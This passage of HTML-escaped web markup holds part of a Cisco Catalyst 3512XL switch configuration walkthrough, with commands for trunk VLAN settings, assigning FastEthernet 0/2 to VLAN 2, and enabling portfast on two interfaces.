255); font-style: italic; "&gt;!-- on the router accordingly.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;!-- You may change the native VLAN, if needed, by using the following command:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;!-- 3512xl(config-if)#switchport trunk native vlan &lt;vlan&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span"  style="color:#0000FF;"&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;!-- Allow all VLANs on the trunk.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;3512xl(config-if)#&lt;b&gt;switchport trunk allowed vlan all&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;3512xl(config-if)#&lt;b&gt;exit&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;!-- The following set of commands will place FastEthernet 0/2&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;!-- into VLAN2 and enable portfast on the interface.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span"  style="color:#0000FF;"&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;3512xl(config)#&lt;b&gt;int fastEthernet 0/2&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;3512xl(config-if)#&lt;b&gt;switchport access vlan 2&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;3512xl(config-if)#&lt;b&gt;spanning-tree portfast&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;3512xl(config-if)#&lt;b&gt;exit&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;!-- FastEthernet 0/3 is already in VLAN1 by default.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;!-- Enable portfast on the interface.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;3512xl(config)#&lt;b&gt;int fastEthernet 0/3&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;3512xl(config-if)#&lt;b&gt;spanning-tree portfast&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;3512xl(config-if)#^Z&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;br /&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;!-- For details on why to enable portfast,&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;!-- refer to:&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;!-- &lt;a href="http://www.cisco.com/en/US/products/hw/switches/ps700/products_tech_note09186a00800b1500.shtml" onclick="s_objectID=&amp;quot;http://www.cisco.com/en/US/products/hw/switches/ps700/products_tech_note09186a00800b1500.shtml_1&amp;quot;;return this.s_oc?this.s_oc(e):true" style="color: rgb(0, 51, 153); "&gt;Using PortFast and Other Commands to Fix Workstation Startup Connectivity Delays&lt;/a&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;!-- Remember to save the 